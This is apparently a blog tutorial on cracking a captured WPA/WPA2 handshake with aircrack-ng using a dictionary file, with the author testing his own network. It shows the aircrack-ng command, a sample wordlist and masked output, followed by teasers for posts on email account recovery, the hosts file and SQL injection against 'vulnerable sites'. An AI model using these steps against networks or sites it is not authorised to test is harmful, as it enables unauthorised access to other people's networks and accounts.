Skip to main content

WPA/WPA2 cracking using Dictionary Attack with Aircrack-ng.

WPA cracking involves 2 steps-


  1. Capture the handshake
  2. Crack the handshake to get the password

We have already covered WPA-handshake capture in a lot of detail. In this tutorial we will actually crack a WPA handshake file using dictionary attack. Our tool of choice for this tutorial will be aircrack-ng. We will not bother about the speed of various tools in this post. However, in the next post, we will compare various CPU and GPU algorithms for WPA hash cracking. I'd like to add that I already know the password of the network so I'll simply put it into the dictionary that I'm using. A full fledged dictionary attack is quite time consuming.

Also, a lot of people are facing problems with monitor mode in Kali 2.0. I have a post regarding that coming soon.
PS: If you stumbled on this post out of nowhere and find it hard to follow, I recommend you go through some of the easier posts first. How to use this site is a good place to begin.



 

My current state

I have already captured a WPA handshake for my Wifi. The password is fairly strong so one can't rely on any dictionary. So just for the sake of this exercise, I'll put the password in the dictionary myself.
 

My handshake capture


The handshake is captured in a file students2-01.cap (you can name yours whatever you want)
 
wireshark students2-01.cap
This command can be used to go through the packets captured. We will learn more about Wireshark later. I will guide you through a complete EAPoL 4-way handshake. For this tutorial, lets move on.
 

My dictionary file

root@kali:~# cat new.txt
firstpass
secondpass
randompass
************ 
 

The last line has the password.
 

Action!

root@kali:~# aircrack-ng students2-01.cap -w new.txt

It will ask for index number of target network. Select the network you want to hack.
I chose 13

 
 It didn't take any time at all considering Aircrack had to check a total of 4 keys!!!
 
                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 4 keys tested (589.45 k/s)


                           KEY FOUND! [ ***************** ]


      Master Key     : 60 B7 9D 29 26 0F 92 65 ** ** ** ** **

      Transient Key  : 1C F2 23 FE B3 67 ** ** ** *
                      
      EAPOL HMAC     : F9 A1 5D ** ** ** ** **

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...
Post a Comment
Read more

Hacking Websites Using SQL Injection attack on Vulnerable Sites...!!

Hacking Websites Using SQL Injection attack on Vulnerable Sites...!! Warning : This is only for EDUCATIONAL purposes to make you aware of the vulnerabilities that may be present in your website so that you may self test it in your OWNED website to IMPROVE the SECURITY....!! The person posting this or the this blog is not responsible for any type malicious activities performed by anyone else....!! This is what they basically teach you when you go for certain  HACKING COURSES  which I have taken pains for hours to put this to you without even earning a penny and sharing it for FREE,,,,!!! Atleast some comments and feedback from you will make me Happy ^_^ So Guyzzz I have now decided to post some serious  ADVANCED LEVEL OF Hacking  stuffs which is how the “Cracker” breaks into your Vulnerable Websites,,,,!!! All you need to know is a bit of SQL queries,,,!!! It doesnt matter even if you are not an expert in So here we go,,, What is SQL Injection? So let ...
Post a Comment
Read more